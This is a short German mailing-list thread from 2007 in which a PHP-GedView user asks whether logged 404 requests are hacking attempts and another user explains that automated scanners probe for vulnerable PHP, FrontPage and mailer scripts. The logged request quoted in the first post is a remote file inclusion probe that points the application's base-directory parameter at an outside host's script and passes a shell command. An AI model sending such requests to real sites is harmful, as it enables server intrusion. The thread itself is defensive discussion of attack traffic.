[PHP-GedView-L] Sind das Hackversuche?

Markus_Dippold · December 17, 2007, 4:43pm

Hallo *.*,

kurz zum besseren Verst�ndnis:
Ich habe mir ein Script gebastelt, das mir beim 404-Fehler eine Mail schickt mit diversen Daten (eigentlich nur, um eigene tote Links festzustellen).

Ok, zum eigentlichen Problem:
Aktuell bekomme ich t�glich mehrfach Mails der folgenden Art:

Aufgerufenene Adresse: //help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http://www.hobbiz.com/images/powered/_vti_cnf/echo2.txt?
IP: 74.54.52.242
Suchstring: Referrer: RemoteHost: Browser: libwww-perl/5.805

Was variiert, ist die IP (lat�rnich) und der URL hinter "PGV_BASE_DIRECTORY".
Mein PGV-Verzeichnis ist allerdings zugangsgesch�tzt (zus�tzlich zum normalen Login von PGV).
Hat jemand von euch auch schon solche "Eindringversuche" festgestellt?

Viele Gr��e,
Markus

Veit_Olschinski · December 18, 2007, 9:56am

Hallo Markus,
das ist nichts besonderes. Auf meiner Website finden jeden Tag einige Dutzend Angriffsversuche statt. Das sind Scripte von Script-Kieddies, die das Web nach Schwachstellen durchforsten. Dabei wird insbesondere nach Schwachstellen durch Frontpage, PHP und offene Mailer-CGI's gesucht, �ber die dann Spam versendet werden kann. Weiter kommt noch das Formular-Spamming hinzu, das unzureichend gesch�tzte G�steb�cher, Foren und Kontaktformulare zum�llt.

Da hilft nur das System dichtmachen und die Software auf dem aktuellen Stand bzgl. Security-Bugs zu halten.

Viele Gr��e,
Veit

Markus Dippold schrieb: